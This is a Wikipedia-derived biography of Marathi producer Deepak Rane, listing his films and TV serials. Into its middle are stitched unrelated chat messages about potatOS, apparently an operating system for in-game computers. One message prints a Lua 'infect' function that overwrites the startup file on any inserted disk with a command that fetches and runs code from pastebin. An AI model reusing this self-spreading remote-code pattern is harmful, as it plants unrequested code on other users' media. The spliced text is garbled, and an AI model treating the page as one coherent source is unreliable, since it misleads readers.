Deepak Rane
Deepak Pandurang Rane is an Indian Marathi Film and TV Serial Producer[5][6][7]
Deepak Rane | |
---|---|
Born | June 14, 1973 |
Nationality | Indian |
Occupation | Producer[1][2] |
Known for | Award winning films 72 Miles Ek Pravas, Duniyadari,and TV Serials Dil Dosti Duniyadari[3] |
Spouse(s) | Deepa Jadhav Rane |
Website | http://www.deepakrane.com/[4] http://www.dreaming24seven.com/ http://dreamerspr.com/dreamers/ |
Career
Deepak Pandurang Rane has begun his career as an ‘A’ Line Producer for movies 72 Miles Ek Pravas produced under Grazing Goat Pictures and co-produced by Akshay Kumar and Ashwini Yardi[8] and Duniyadari, Duniyadari was one of the greatest Marathi blockbusters of all times. He eventually became a full-fledged producer and carved a niche for himself with movies like Pyaar Vali Love Story, Tuhire and Guru.
He has also produced the award winning TV serial Dil Dosti Duniyadari for channel Zee Marathi,[9] Deepak Rane also produced Action Drama serial Duheri for channel Star Pravah and he has also produced a new serial Freshers for channel Zee Yuva[10][11]
Film Produced
- Duniyadari
- PyarWali Love Story
- Tuhire
- Guru
- Luckee
Serials Produced
- Dil Dosti Duniyadari
- Duheri
- Freshers
- Anjali
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.
References
- "Archived copy". Archived from the original on 2016-08-21. Retrieved 2016-08-20.CS1 maint: archived copy as title (link)
- dreamerspr.com
- http://tvkiduniya.com/zee-marathi-awards-2015-presented-by-waman-hari-pethe-details-winners-anchors-performances-event-details/
- Rane, Deepak. "Deepak Rane". Deepak Rane. Retrieved 12 July 2019.
- "Dreaming24Seven". dreaming24seven.com. Retrieved 2016-08-20.
- "DreamersPR". dreamerspr.com. Retrieved 2016-08-20.
- http://dreamerspr.com/dreamers/
- http://www.bollywoodhungama.com/movies/features/type/view/id/4203
- http://www.dreaming24seven.com/
- "Archived copy". Archived from the original on 2016-08-12. Retrieved 2016-08-20.CS1 maint: archived copy as title (link)
- http://starmarathi.in/freshers-zee-yuva-serial/
External links
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.